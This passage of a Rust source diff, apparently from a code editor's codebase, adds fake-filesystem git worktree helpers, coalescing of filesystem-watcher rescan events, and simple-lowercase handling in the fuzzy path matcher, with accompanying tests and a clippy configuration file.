system_git_binary_path.map(|path| path.to_path_buf()), @@ -1672,6 +1743,10 @@ impl FakeFs { self.state.lock().buffered_events.len() } + pub fn clear_buffered_events(&self) { + self.state.lock().buffered_events.clear(); + } + pub fn flush_events(&self, count: usize) { self.state.lock().flush_events(count); } @@ -1817,11 +1892,15 @@ impl FakeFs { anyhow::bail!("gitfile points to a non-directory") }; let common_dir = if let Some(child) = entries.get("commondir") { - Path::new( - std::str::from_utf8(child.file_content("commondir".as_ref())?) - .context("commondir content")?, - ) - .to_owned() + let raw = std::str::from_utf8(child.file_content("commondir".as_ref())?) + .context("commondir content")? + .trim(); + let raw_path = Path::new(raw); + if raw_path.is_relative() { + normalize_path(&canonical_path.join(raw_path)) + } else { + raw_path.to_owned() + } } else { canonical_path.clone() }; @@ -1885,6 +1964,116 @@ impl FakeFs { .unwrap(); } + pub async fn add_linked_worktree_for_repo( + &self, + dot_git: &Path, + emit_git_event: bool, + worktree: Worktree, + ) { + let ref_name = worktree + .ref_name + .as_ref() + .expect("linked worktree must have a ref_name"); + let branch_name = ref_name + .strip_prefix("refs/heads/") + .unwrap_or(ref_name.as_ref()); + + // Create ref in git state. + self.with_git_state(dot_git, false, |state| { + state + .refs + .insert(ref_name.to_string(), worktree.sha.to_string()); + }) + .unwrap(); + + // Create .git/worktrees// directory with HEAD, commondir, and gitdir. + let worktrees_entry_dir = dot_git.join("worktrees").join(branch_name); + self.create_dir(&worktrees_entry_dir).await.unwrap(); + + self.write_file_internal( + worktrees_entry_dir.join("HEAD"), + format!("ref: {ref_name}").into_bytes(), + false, + ) + .unwrap(); + + self.write_file_internal( + worktrees_entry_dir.join("commondir"), + dot_git.to_string_lossy().into_owned().into_bytes(), + false, + ) + .unwrap(); + + let worktree_dot_git = worktree.path.join(".git"); + self.write_file_internal( + worktrees_entry_dir.join("gitdir"), + worktree_dot_git.to_string_lossy().into_owned().into_bytes(), + false, + ) + .unwrap(); + + // Create the worktree checkout directory with a .git file pointing back. + self.create_dir(&worktree.path).await.unwrap(); + + self.write_file_internal( + &worktree_dot_git, + format!("gitdir: {}", worktrees_entry_dir.display()).into_bytes(), + false, + ) + .unwrap(); + + if emit_git_event { + self.with_git_state(dot_git, true, |_| {}).unwrap(); + } + } + + pub async fn remove_worktree_for_repo( + &self, + dot_git: &Path, + emit_git_event: bool, + ref_name: &str, + ) { + let branch_name = ref_name.strip_prefix("refs/heads/").unwrap_or(ref_name); + let worktrees_entry_dir = dot_git.join("worktrees").join(branch_name); + + // Read gitdir to find the worktree checkout path. + let gitdir_content = self + .load_internal(worktrees_entry_dir.join("gitdir")) + .await + .unwrap(); + let gitdir_str = String::from_utf8(gitdir_content).unwrap(); + let worktree_path = PathBuf::from(gitdir_str.trim()) + .parent() + .map(PathBuf::from) + .unwrap_or_default(); + + // Remove the worktree checkout directory. + self.remove_dir( + &worktree_path, + RemoveOptions { + recursive: true, + ignore_if_not_exists: true, + }, + ) + .await + .unwrap(); + + // Remove the .git/worktrees// directory. + self.remove_dir( + &worktrees_entry_dir, + RemoveOptions { + recursive: true, + ignore_if_not_exists: false, + }, + ) + .await + .unwrap(); + + if emit_git_event { + self.with_git_state(dot_git, true, |_| {}).unwrap(); + } + } + pub fn set_unmerged_paths_for_repo( &self, dot_git: &Path, @@ -2762,9 +2951,7 @@ impl Fs for FakeFs { &self, abs_dot_git: &Path, _system_git_binary: Option<&Path>, - ) -> Option> { - use util::ResultExt as _; - + ) -> Result> { self.with_git_state_and_paths( abs_dot_git, false, @@ -2776,10 +2963,10 @@ impl Fs for FakeFs { repository_dir_path: repository_dir_path.to_owned(), common_dir_path: common_dir_path.to_owned(), checkpoints: Arc::default(), + is_trusted: Arc::default(), }) as _ }, ) - .log_err() } async fn git_init( @@ -2814,10 +3001,6 @@ impl Fs for FakeFs { } } -pub fn normalize_path(path: &Path) -> PathBuf { - util::normalize_path(path) -} - pub async fn copy_recursive<'a>( fs: &'a dyn Fs, source: &'a Path, diff --git a/crates/fs/src/fs_watcher.rs b/crates/fs/src/fs_watcher.rs index efb381c9a5480df598d774dd17e9c49f8ef82f92..02a6b0878110ba1298821ffdf2fb5babecfc81d3 100644 --- a/crates/fs/src/fs_watcher.rs +++ b/crates/fs/src/fs_watcher.rs @@ -3,6 +3,7 @@ use parking_lot::Mutex; use std::{ collections::{BTreeMap, HashMap}, ops::DerefMut, + path::Path, sync::{Arc, OnceLock}, }; use util::{ResultExt, paths::SanitizedPath}; @@ -86,10 +87,12 @@ impl Watcher for FsWatcher { #[cfg(target_os = "linux")] let mode = notify::RecursiveMode::NonRecursive; + let registration_path = path.clone(); let registration_id = global({ - let path = path.clone(); + let watch_path = path.clone(); + let callback_path = path; |g| { - g.add(path, mode, move |event: ¬ify::Event| { + g.add(watch_path, mode, move |event: ¬ify::Event| { log::trace!("watcher received event: {event:?}"); let kind = match event.kind { EventKind::Create(_) => Some(PathEventKind::Created), @@ -109,12 +112,27 @@ impl Watcher for FsWatcher { }) .collect::>(); + let is_rescan_event = event.need_rescan(); + if is_rescan_event { + log::warn!( + "filesystem watcher lost sync for {callback_path:?}; scheduling rescan" + ); + // we only keep the first event per path below, this ensures it will be the rescan event + // we'll remove any existing pending events for the same reason once we have the lock below + path_events.retain(|p| &p.path != callback_path.as_ref()); + path_events.push(PathEvent { + path: callback_path.to_path_buf(), + kind: Some(PathEventKind::Rescan), + }); + } + if !path_events.is_empty() { path_events.sort(); let mut pending_paths = pending_paths.lock(); if pending_paths.is_empty() { tx.try_send(()).ok(); } + coalesce_pending_rescans(&mut pending_paths, &mut path_events); util::extend_sorted( &mut *pending_paths, path_events, @@ -126,7 +144,9 @@ impl Watcher for FsWatcher { } })??; - self.registrations.lock().insert(path, registration_id); + self.registrations + .lock() + .insert(registration_path, registration_id); Ok(()) } @@ -141,6 +161,56 @@ impl Watcher for FsWatcher { } } +fn coalesce_pending_rescans(pending_paths: &mut Vec, path_events: &mut Vec) { + if !path_events + .iter() + .any(|event| event.kind == Some(PathEventKind::Rescan)) + { + return; + } + + let mut new_rescan_paths: Vec = path_events + .iter() + .filter(|e| e.kind == Some(PathEventKind::Rescan)) + .map(|e| e.path.clone()) + .collect(); + new_rescan_paths.sort_unstable(); + + let mut deduped_rescans: Vec = Vec::with_capacity(new_rescan_paths.len()); + for path in new_rescan_paths { + if deduped_rescans + .iter() + .any(|ancestor| path != *ancestor && path.starts_with(ancestor)) + { + continue; + } + deduped_rescans.push(path); + } + + deduped_rescans.retain(|new_path| { + !pending_paths + .iter() + .any(|pending| is_covered_rescan(pending.kind, new_path, &pending.path)) + }); + + if !deduped_rescans.is_empty() { + pending_paths.retain(|pending| { + !deduped_rescans.iter().any(|rescan_path| { + pending.path == *rescan_path + || is_covered_rescan(pending.kind, &pending.path, rescan_path) + }) + }); + } + + path_events.retain(|event| { + event.kind != Some(PathEventKind::Rescan) || deduped_rescans.contains(&event.path) + }); +} + +fn is_covered_rescan(kind: Option, path: &Path, ancestor: &Path) -> bool { + kind == Some(PathEventKind::Rescan) && path != ancestor && path.starts_with(ancestor) +} + #[derive(Default, Debug, Copy, Clone, PartialEq, Eq, Hash)] pub struct WatcherRegistrationId(u32); @@ -238,6 +308,97 @@ impl GlobalWatcher { static FS_WATCHER_INSTANCE: OnceLock> = OnceLock::new(); +#[cfg(test)] +mod tests { + use super::*; + use std::path::PathBuf; + + fn rescan(path: &str) -> PathEvent { + PathEvent { + path: PathBuf::from(path), + kind: Some(PathEventKind::Rescan), + } + } + + fn changed(path: &str) -> PathEvent { + PathEvent { + path: PathBuf::from(path), + kind: Some(PathEventKind::Changed), + } + } + + struct TestCase { + name: &'static str, + pending_paths: Vec, + path_events: Vec, + expected_pending_paths: Vec, + expected_path_events: Vec, + } + + #[test] + fn test_coalesce_pending_rescans() { + let test_cases = [ + TestCase { + name: "coalesces descendant rescans under pending ancestor", + pending_paths: vec![rescan("/root")], + path_events: vec![rescan("/root/child"), rescan("/root/child/grandchild")], + expected_pending_paths: vec![rescan("/root")], + expected_path_events: vec![], + }, + TestCase { + name: "new ancestor rescan replaces pending descendant rescans", + pending_paths: vec![ + changed("/other"), + rescan("/root/child"), + rescan("/root/child/grandchild"), + ], + path_events: vec![rescan("/root")], + expected_pending_paths: vec![changed("/other")], + expected_path_events: vec![rescan("/root")], + }, + TestCase { + name: "same path rescan replaces pending non-rescan event", + pending_paths: vec![changed("/root")], + path_events: vec![rescan("/root")], + expected_pending_paths: vec![], + expected_path_events: vec![rescan("/root")], + }, + TestCase { + name: "unrelated rescans are preserved", + pending_paths: vec![rescan("/root-a")], + path_events: vec![rescan("/root-b")], + expected_pending_paths: vec![rescan("/root-a")], + expected_path_events: vec![rescan("/root-b")], + }, + TestCase { + name: "batch ancestor rescan replaces descendant rescan", + pending_paths: vec![], + path_events: vec![rescan("/root/child"), rescan("/root")], + expected_pending_paths: vec![], + expected_path_events: vec![rescan("/root")], + }, + ]; + + for test_case in test_cases { + let mut pending_paths = test_case.pending_paths; + let mut path_events = test_case.path_events; + + coalesce_pending_rescans(&mut pending_paths, &mut path_events); + + assert_eq!( + pending_paths, test_case.expected_pending_paths, + "pending_paths mismatch for case: {}", + test_case.name + ); + assert_eq!( + path_events, test_case.expected_path_events, + "path_events mismatch for case: {}", + test_case.name + ); + } + } +} + fn handle_event(event: Result) { log::trace!("global handle event: {event:?}"); // Filter out access events, which could lead to a weird bug on Linux after upgrading notify diff --git a/crates/fs/tests/integration/fake_git_repo.rs b/crates/fs/tests/integration/fake_git_repo.rs index 36dfcaf168b4f0190c5c49bf4798fac7bc9bd37b..f4192a22bb42f88f8769ef59f817b2bf2a288fb9 100644 --- a/crates/fs/tests/integration/fake_git_repo.rs +++ b/crates/fs/tests/integration/fake_git_repo.rs @@ -1,9 +1,122 @@ use fs::{FakeFs, Fs}; -use gpui::BackgroundExecutor; +use gpui::{BackgroundExecutor, TestAppContext}; use serde_json::json; -use std::path::Path; +use std::path::{Path, PathBuf}; use util::path; +#[gpui::test] +async fn test_fake_worktree_lifecycle(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/project", json!({".git": {}, "file.txt": "content"})) + .await; + let repo = fs + .open_repo(Path::new("/project/.git"), None) + .expect("should open fake repo"); + + // Initially only the main worktree exists + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 1); + assert_eq!(worktrees[0].path, PathBuf::from("/project")); + + fs.create_dir("/my-worktrees".as_ref()).await.unwrap(); + let worktrees_dir = Path::new("/my-worktrees"); + + // Create a worktree + let worktree_1_dir = worktrees_dir.join("feature-branch"); + repo.create_worktree( + Some("feature-branch".to_string()), + worktree_1_dir.clone(), + Some("abc123".to_string()), + ) + .await + .unwrap(); + + // List worktrees — should have main + one created + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 2); + assert_eq!(worktrees[0].path, PathBuf::from("/project")); + assert_eq!(worktrees[1].path, worktree_1_dir); + assert_eq!( + worktrees[1].ref_name, + Some("refs/heads/feature-branch".into()) + ); + assert_eq!(worktrees[1].sha.as_ref(), "abc123"); + + // Directory should exist in FakeFs after create + assert!(fs.is_dir(&worktrees_dir.join("feature-branch")).await); + + // Create a second worktree (without explicit commit) + let worktree_2_dir = worktrees_dir.join("bugfix-branch"); + repo.create_worktree( + Some("bugfix-branch".to_string()), + worktree_2_dir.clone(), + None, + ) + .await + .unwrap(); + + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 3); + assert!(fs.is_dir(&worktree_2_dir).await); + + // Rename the first worktree + repo.rename_worktree(worktree_1_dir, worktrees_dir.join("renamed-branch")) + .await + .unwrap(); + + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 3); + assert!( + worktrees + .iter() + .any(|w| w.path == worktrees_dir.join("renamed-branch")), + ); + assert!( + worktrees + .iter() + .all(|w| w.path != worktrees_dir.join("feature-branch")), + ); + + // Directory should be moved in FakeFs after rename + assert!(!fs.is_dir(&worktrees_dir.join("feature-branch")).await); + assert!(fs.is_dir(&worktrees_dir.join("renamed-branch")).await); + + // Rename a nonexistent worktree should fail + let result = repo + .rename_worktree(PathBuf::from("/nonexistent"), PathBuf::from("/somewhere")) + .await; + assert!(result.is_err()); + + // Remove a worktree + repo.remove_worktree(worktrees_dir.join("renamed-branch"), false) + .await + .unwrap(); + + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 2); + assert_eq!(worktrees[0].path, PathBuf::from("/project")); + assert_eq!(worktrees[1].path, worktree_2_dir); + + // Directory should be removed from FakeFs after remove + assert!(!fs.is_dir(&worktrees_dir.join("renamed-branch")).await); + + // Remove a nonexistent worktree should fail + let result = repo + .remove_worktree(PathBuf::from("/nonexistent"), false) + .await; + assert!(result.is_err()); + + // Remove the last worktree + repo.remove_worktree(worktree_2_dir.clone(), false) + .await + .unwrap(); + + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 1); + assert_eq!(worktrees[0].path, PathBuf::from("/project")); + assert!(!fs.is_dir(&worktree_2_dir).await); +} + #[gpui::test] async fn test_checkpoints(executor: BackgroundExecutor) { let fs = FakeFs::new(executor); @@ -46,7 +159,10 @@ async fn test_checkpoints(executor: BackgroundExecutor) { .unwrap() ); - repository.restore_checkpoint(checkpoint_1).await.unwrap(); + repository + .restore_checkpoint(checkpoint_1.clone()) + .await + .unwrap(); assert_eq!( fs.files_with_contents(Path::new("")), [ @@ -55,4 +171,22 @@ async fn test_checkpoints(executor: BackgroundExecutor) { (Path::new(path!("/foo/b")).into(), b"ipsum".into()) ] ); + + // diff_checkpoints: identical checkpoints produce empty diff + let diff = repository + .diff_checkpoints(checkpoint_2.clone(), checkpoint_3.clone()) + .await + .unwrap(); + assert!( + diff.is_empty(), + "identical checkpoints should produce empty diff" + ); + + // diff_checkpoints: different checkpoints produce non-empty diff + let diff = repository + .diff_checkpoints(checkpoint_1.clone(), checkpoint_2.clone()) + .await + .unwrap(); + assert!(diff.contains("b"), "diff should mention changed file 'b'"); + assert!(diff.contains("c"), "diff should mention added file 'c'"); } diff --git a/crates/fs/tests/integration/fs.rs b/crates/fs/tests/integration/fs.rs index dd5e694e23c99716a81b27afd487e3a6ea648209..34c1430a995402bd1e28817785c3b4ff707d4abd 100644 --- a/crates/fs/tests/integration/fs.rs +++ b/crates/fs/tests/integration/fs.rs @@ -1,10 +1,14 @@ use std::{ + collections::BTreeSet, io::Write, path::{Path, PathBuf}, + time::Duration, }; +use futures::{FutureExt, StreamExt}; + use fs::*; -use gpui::BackgroundExecutor; +use gpui::{BackgroundExecutor, TestAppContext}; use serde_json::json; use tempfile::TempDir; use util::path; @@ -523,6 +527,65 @@ async fn test_rename(executor: BackgroundExecutor) { ); } +#[gpui::test] +#[cfg(any(target_os = "macos", target_os = "linux", target_os = "windows"))] +async fn test_realfs_parallel_rename_without_overwrite_preserves_losing_source( + executor: BackgroundExecutor, +) { + let temp_dir = TempDir::new().unwrap(); + let root = temp_dir.path(); + let source_a = root.join("dir_a/shared.txt"); + let source_b = root.join("dir_b/shared.txt"); + let target = root.join("shared.txt"); + + std::fs::create_dir_all(source_a.parent().unwrap()).unwrap(); + std::fs::create_dir_all(source_b.parent().unwrap()).unwrap(); + std::fs::write(&source_a, "from a").unwrap(); + std::fs::write(&source_b, "from b").unwrap(); + + let fs = RealFs::new(None, executor); + let (first_result, second_result) = futures::future::join( + fs.rename(&source_a, &target, RenameOptions::default()), + fs.rename(&source_b, &target, RenameOptions::default()), + ) + .await; + + assert_ne!(first_result.is_ok(), second_result.is_ok()); + assert!(target.exists()); + assert_eq!(source_a.exists() as u8 + source_b.exists() as u8, 1); +} + +#[gpui::test] +#[cfg(any(target_os = "macos", target_os = "linux", target_os = "windows"))] +async fn test_realfs_rename_ignore_if_exists_leaves_source_and_target_unchanged( + executor: BackgroundExecutor, +) { + let temp_dir = TempDir::new().unwrap(); + let root = temp_dir.path(); + let source = root.join("source.txt"); + let target = root.join("target.txt"); + + std::fs::write(&source, "from source").unwrap(); + std::fs::write(&target, "from target").unwrap(); + + let fs = RealFs::new(None, executor); + let result = fs + .rename( + &source, + &target, + RenameOptions { + ignore_if_exists: true, + ..Default::default() + }, + ) + .await; + + assert!(result.is_ok()); + + assert_eq!(std::fs::read_to_string(&source).unwrap(), "from source"); + assert_eq!(std::fs::read_to_string(&target).unwrap(), "from target"); +} + #[gpui::test] #[cfg(unix)] async fn test_realfs_broken_symlink_metadata(executor: BackgroundExecutor) { @@ -562,3 +625,90 @@ async fn test_realfs_symlink_loop_metadata(executor: BackgroundExecutor) { assert!(!metadata.is_executable); // don't care about len or mtime on symlinks? } + +#[gpui::test] +#[ignore = "stress test; run explicitly when needed"] +async fn test_realfs_watch_stress_reports_missed_paths( + executor: BackgroundExecutor, + cx: &mut TestAppContext, +) { + const FILE_COUNT: usize = 32000; + cx.executor().allow_parking(); + + let fs = RealFs::new(None, executor.clone()); + let temp_dir = TempDir::new().expect("create temp dir"); + let root = temp_dir.path(); + + let mut file_paths = Vec::with_capacity(FILE_COUNT); + let mut expected_paths = BTreeSet::new(); + + for index in 0..FILE_COUNT { + let dir_path = root.join(format!("dir-{index:04}")); + let file_path = dir_path.join("file.txt"); + fs.create_dir(&dir_path).await.expect("create watched dir"); + fs.write(&file_path, b"before") + .await + .expect("create initial file"); + expected_paths.insert(file_path.clone()); + file_paths.push(file_path); + } + + let (mut events, watcher) = fs.watch(root, Duration::from_millis(10)).await; + let _watcher = watcher; + + for file_path in &expected_paths { + _watcher + .add(file_path.parent().expect("file has parent")) + .expect("add explicit directory watch"); + } + + for (index, file_path) in file_paths.iter().enumerate() { + let content = format!("after-{index}"); + fs.write(file_path, content.as_bytes()) + .await + .expect("modify watched file"); + } + + let mut changed_paths = BTreeSet::new(); + let mut rescan_count: u32 = 0; + let timeout = executor.timer(Duration::from_secs(10)).fuse(); + + futures::pin_mut!(timeout); + + let mut ticks = 0; + while ticks < 1000 { + if let Some(batch) = events.next().fuse().now_or_never().flatten() { + for event in batch { + if event.kind == Some(PathEventKind::Rescan) { + rescan_count += 1; + } + if expected_paths.contains(&event.path) { + changed_paths.insert(event.path); + } + } + if changed_paths.len() == expected_paths.len() { + break; + } + ticks = 0; + } else { + ticks += 1; + executor.timer(Duration::from_millis(10)).await; + } + } + + let missed_paths: BTreeSet<_> = expected_paths.difference(&changed_paths).cloned().collect(); + + eprintln!( + "realfs watch stress: expected={}, observed={}, missed={}, rescan={}", + expected_paths.len(), + changed_paths.len(), + missed_paths.len(), + rescan_count + ); + + assert!( + missed_paths.is_empty() || rescan_count > 0, + "missed {} paths without rescan being reported", + missed_paths.len() + ); +} diff --git a/crates/fuzzy/src/char_bag.rs b/crates/fuzzy/src/char_bag.rs index 13b00816ed0141117fb6d5ac9265e4b82c7aa57d..1821a63793337862d9d6ad01a6a42072588d7be5 100644 --- a/crates/fuzzy/src/char_bag.rs +++ b/crates/fuzzy/src/char_bag.rs @@ -1,5 +1,9 @@ use std::iter::FromIterator; +pub fn simple_lowercase(c: char) -> char { + c.to_lowercase().next().unwrap_or(c) +} + #[derive(Copy, Clone, Debug, Default, PartialEq, Eq, Hash)] pub struct CharBag(u64); @@ -9,7 +13,7 @@ impl CharBag { } fn insert(&mut self, c: char) { - let c = c.to_ascii_lowercase(); + let c = simple_lowercase(c); if c.is_ascii_lowercase() { let mut count = self.0; let idx = c as u8 - b'a'; diff --git a/crates/fuzzy/src/matcher.rs b/crates/fuzzy/src/matcher.rs index 782c9caca832d81fb6e4bce8f49b4f310664b292..102708d2fad6b560b1a606c34246033587affdda 100644 --- a/crates/fuzzy/src/matcher.rs +++ b/crates/fuzzy/src/matcher.rs @@ -1,10 +1,9 @@ use std::{ borrow::Borrow, - collections::BTreeMap, sync::atomic::{self, AtomicBool}, }; -use crate::CharBag; +use crate::{CharBag, char_bag::simple_lowercase}; const BASE_DISTANCE_PENALTY: f64 = 0.6; const ADDITIONAL_DISTANCE_PENALTY: f64 = 0.05; @@ -69,7 +68,6 @@ impl<'a> Matcher<'a> { { let mut candidate_chars = Vec::new(); let mut lowercase_candidate_chars = Vec::new(); - let mut extra_lowercase_chars = BTreeMap::new(); for candidate in candidates { if !candidate.borrow().has_chars(self.query_char_bag) { @@ -82,14 +80,9 @@ impl<'a> Matcher<'a> { candidate_chars.clear(); lowercase_candidate_chars.clear(); - extra_lowercase_chars.clear(); - for (i, c) in candidate.borrow().candidate_chars().enumerate() { + for c in candidate.borrow().candidate_chars() { candidate_chars.push(c); - let mut char_lowercased = c.to_lowercase().collect::>(); - if char_lowercased.len() > 1 { - extra_lowercase_chars.insert(i, char_lowercased.len() - 1); - } - lowercase_candidate_chars.append(&mut char_lowercased); + lowercase_candidate_chars.push(simple_lowercase(c)); } if !self.find_last_positions(lowercase_prefix, &lowercase_candidate_chars) { @@ -108,7 +101,6 @@ impl<'a> Matcher<'a> { &lowercase_candidate_chars, prefix, lowercase_prefix, - &extra_lowercase_chars, ); if score > 0.0 { @@ -146,7 +138,6 @@ impl<'a> Matcher<'a> { path_lowercased: &[char], prefix: &[char], lowercase_prefix: &[char], - extra_lowercase_chars: &BTreeMap, ) -> f64 { let score = self.recursive_score_match( path, @@ -156,7 +147,6 @@ impl<'a> Matcher<'a> { 0, 0, self.query.len() as f64, - extra_lowercase_chars, ) * self.query.len() as f64; if score <= 0.0 { @@ -201,7 +191,6 @@ impl<'a> Matcher<'a> { query_idx: usize, path_idx: usize, cur_score: f64, - extra_lowercase_chars: &BTreeMap, ) -> f64 { if query_idx == self.query.len() { return 1.0; @@ -228,13 +217,6 @@ impl<'a> Matcher<'a> { let mut last_slash = 0; for j in path_idx..=safe_limit { - let extra_lowercase_chars_count = extra_lowercase_chars - .iter() - .take_while(|&(&i, _)| i < j) - .map(|(_, increment)| increment) - .sum::(); - let j_regular = j - extra_lowercase_chars_count; - let path_char = if j < prefix.len() { lowercase_prefix[j] } else { @@ -247,20 +229,20 @@ impl<'a> Matcher<'a> { let is_path_sep = path_char == '/'; if query_idx == 0 && is_path_sep { - last_slash = j_regular; + last_slash = j; } let need_to_score = query_char == path_char || (is_path_sep && query_char == '_'); if need_to_score { - let curr = match prefix.get(j_regular) { + let curr = match prefix.get(j) { Some(&curr) => curr, - None => path[j_regular - prefix.len()], + None => path[j - prefix.len()], }; let mut char_score = 1.0; if j > path_idx { - let last = match prefix.get(j_regular - 1) { + let last = match prefix.get(j - 1) { Some(&last) => last, - None => path[j_regular - 1 - prefix.len()], + None => path[j - 1 - prefix.len()], }; if last == '/' { @@ -316,12 +298,11 @@ impl<'a> Matcher<'a> { query_idx + 1, j + 1, next_score, - extra_lowercase_chars, ) * multiplier; if new_score > score { score = new_score; - best_position = j_regular; + best_position = j; // Optimization: can't score better than 1. if new_score == 1.0 { break; @@ -469,12 +450,12 @@ mod tests { assert_eq!( match_single_path_query("İo/oluş", false, &mixed_unicode_paths), - vec![("İolu/oluş", vec![0, 2, 4, 6, 8, 10, 12])] + vec![("İolu/oluş", vec![0, 2, 5, 6, 7, 8, 9])] ); assert_eq!( match_single_path_query("İst/code", false, &mixed_unicode_paths), - vec![("İstanbul/code", vec![0, 2, 4, 6, 8, 10, 12, 14])] + vec![("İstanbul/code", vec![0, 2, 3, 9, 10, 11, 12, 13])] ); assert_eq!( @@ -536,12 +517,60 @@ mod tests { ); } + #[test] + fn test_positions_are_valid_char_boundaries_with_expanding_lowercase() { + // İ (U+0130) lowercases to "i\u{307}" (2 chars) under full case folding. + // With simple case mapping (used by this matcher), İ → 'i' (1 char), + // so positions remain valid byte boundaries. + let paths = vec!["İstanbul/code.rs", "aİbİc/dİeİf.txt", "src/İmport/İndex.ts"]; + + for query in &["code", "İst", "dİe", "İndex", "İmport", "abcdef"] { + let results = match_single_path_query(query, false, &paths); + for (path, positions) in &results { + for &pos in positions { + assert!( + path.is_char_boundary(pos), + "Position {pos} is not a valid char boundary in path {path:?} \ + (query: {query:?}, all positions: {positions:?})" + ); + } + } + } + } + + #[test] + fn test_positions_valid_with_various_multibyte_chars() { + // German ß uppercases to SS but lowercases to itself — no expansion. + // Armenian ligatures and other characters that could expand under full + // case folding should still produce valid byte boundaries. + let paths = vec![ + "straße/config.rs", + "Straße/München/file.txt", + "file/path.rs", // fi (U+FB01, fi ligature) + "ffoo/bar.txt", // ff (U+FB00, ff ligature) + "aÇbŞc/dÖeÜf.txt", // Turkish chars that don't expand + ]; + + for query in &["config", "Mün", "file", "bar", "abcdef", "straße", "ÇŞ"] { + let results = match_single_path_query(query, false, &paths); + for (path, positions) in &results { + for &pos in positions { + assert!( + path.is_char_boundary(pos), + "Position {pos} is not a valid char boundary in path {path:?} \ + (query: {query:?}, all positions: {positions:?})" + ); + } + } + } + } + fn match_single_path_query<'a>( query: &str, smart_case: bool, paths: &[&'a str], ) -> Vec<(&'a str, Vec)> { - let lowercase_query = query.to_lowercase().chars().collect::>(); + let lowercase_query = query.chars().map(simple_lowercase).collect::>(); let query = query.chars().collect::>(); let query_chars = CharBag::from(&lowercase_query[..]); @@ -551,7 +580,7 @@ mod tests { .collect::>(); let mut path_entries = Vec::new(); for (i, path) in paths.iter().enumerate() { - let lowercase_path = path.to_lowercase().chars().collect::>(); + let lowercase_path: Vec = path.chars().map(simple_lowercase).collect(); let char_bag = CharBag::from(lowercase_path.as_slice()); path_entries.push(PathMatchCandidate { is_dir: false, diff --git a/crates/fuzzy/src/paths.rs b/crates/fuzzy/src/paths.rs index cce0e082840c4cd05d6e2b21eac0073d3eb7700f..2f92f05b96a3be2da7053365d8a7c53722db6ab8 100644 --- a/crates/fuzzy/src/paths.rs +++ b/crates/fuzzy/src/paths.rs @@ -10,6 +10,7 @@ use util::{paths::PathStyle, rel_path::RelPath}; use crate::{ CharBag, + char_bag::simple_lowercase, matcher::{MatchCandidate, Matcher}, }; @@ -94,7 +95,7 @@ pub fn match_fixed_path_set( max_results: usize, path_style: PathStyle, ) -> Vec { - let lowercase_query = query.to_lowercase().chars().collect::>(); + let lowercase_query = query.chars().map(simple_lowercase).collect::>(); let query = query.chars().collect::>(); let query_char_bag = CharBag::from(&lowercase_query[..]); @@ -110,7 +111,7 @@ pub fn match_fixed_path_set( path_prefix_chars.extend(path_style.primary_separator().chars()); let lowercase_pfx = path_prefix_chars .iter() - .map(|c| c.to_ascii_lowercase()) + .map(|c| simple_lowercase(*c)) .collect::>(); (worktree_root_name, path_prefix_chars, lowercase_pfx) @@ -171,7 +172,7 @@ pub async fn match_path_sets<'a, Set: PathMatchCandidateSet<'a>>( let lowercase_query = query .iter() - .map(|query| query.to_ascii_lowercase()) + .map(|query| simple_lowercase(*query)) .collect::>(); let query = &query; @@ -217,7 +218,7 @@ pub async fn match_path_sets<'a, Set: PathMatchCandidateSet<'a>>( } let lowercase_prefix = prefix .iter() - .map(|c| c.to_ascii_lowercase()) + .map(|c| simple_lowercase(*c)) .collect::>(); matcher.match_candidates( &prefix, diff --git a/crates/fuzzy/src/strings.rs b/crates/fuzzy/src/strings.rs index 54539840cfb0ca251428d9f78d5d134f16afdf4c..fb191bd9dcadd81a5a9890032ef8b185cdf7342e 100644 --- a/crates/fuzzy/src/strings.rs +++ b/crates/fuzzy/src/strings.rs @@ -1,5 +1,6 @@ use crate::{ CharBag, + char_bag::simple_lowercase, matcher::{MatchCandidate, Matcher}, }; use gpui::BackgroundExecutor; @@ -141,7 +142,7 @@ where .collect(); } - let lowercase_query = query.to_lowercase().chars().collect::>(); + let lowercase_query = query.chars().map(simple_lowercase).collect::>(); let query = query.chars().collect::>(); let lowercase_query = &lowercase_query; diff --git a/crates/git/Cargo.toml b/crates/git/Cargo.toml index 4d96312e274b3934e0d1ae8aa1f16f235d30a59f..23a937bf1fa17481eb5e130b3e083274dd3f1d16 100644 --- a/crates/git/Cargo.toml +++ b/crates/git/Cargo.toml @@ -48,7 +48,6 @@ ztracing.workspace = true pretty_assertions.workspace = true serde_json.workspace = true text = { workspace = true, features = ["test-support"] } -unindent.workspace = true gpui = { workspace = true, features = ["test-support"] } tempfile.workspace = true rand.workspace = true diff --git a/crates/git/clippy.toml b/crates/git/clippy.toml new file mode 100644 index 0000000000000000000000000000000000000000..fb3926840493fd5981c1861e7cea96bd54b9647f --- /dev/null +++ b/crates/git/clippy.toml @@ -0,0 +1,28 @@ +allow-private-module-inception = true +avoid-breaking-exported-api = false +ignore-interior-mutability = [ + # Suppresses clippy::mutable_key_type, which is a false positive as the Eq + # and Hash impls do not use fields with interior mutability. + "agent_ui::context::AgentContextKey" +] +disallowed-methods = [ + { path = "std::process::Command::spawn", reason = "Spawning `std::process::Command` can block the current thread for an unknown duration", replacement = "smol::process::Command::spawn" }, + { path = "std::process::Command::output", reason = "Spawning `std::process::Command` can block the current thread for an unknown duration", replacement = "smol::process::Command::output" }, + { path = "std::process::Command::status", reason = "Spawning `std::process::Command` can block the current thread for an unknown duration", replacement = "smol::process::Command::status" }, + { path = "std::process::Command::stdin", reason = "`smol::process::Command::from()` does not preserve stdio configuration", replacement = "smol::process::Command::stdin" }, + { path = "std::process::Command::stdout", reason = "`smol::process::Command::from()` does not preserve stdio configuration", replacement = "smol::process::Command::stdout" }, + { path = "std::process::Command::stderr", reason = "`smol::process::Command::from()` does not preserve stdio configuration", replacement = "smol::process::Command::stderr" }, + { path = "smol::Timer::after", reason = "smol::Timer introduces non-determinism in tests", replacement = "gpui::BackgroundExecutor::timer" }, + { path = "serde_json::from_reader", reason = "Parsing from a buffer is much slower than first reading the buffer into a Vec/String, see https://github.com/serde-rs/json/issues/160#issuecomment-253446892. Use `serde_json::from_slice` instead." }, + { path = "serde_json_lenient::from_reader", reason = "Parsing from a buffer is much slower than first reading the buffer into a Vec/String, see 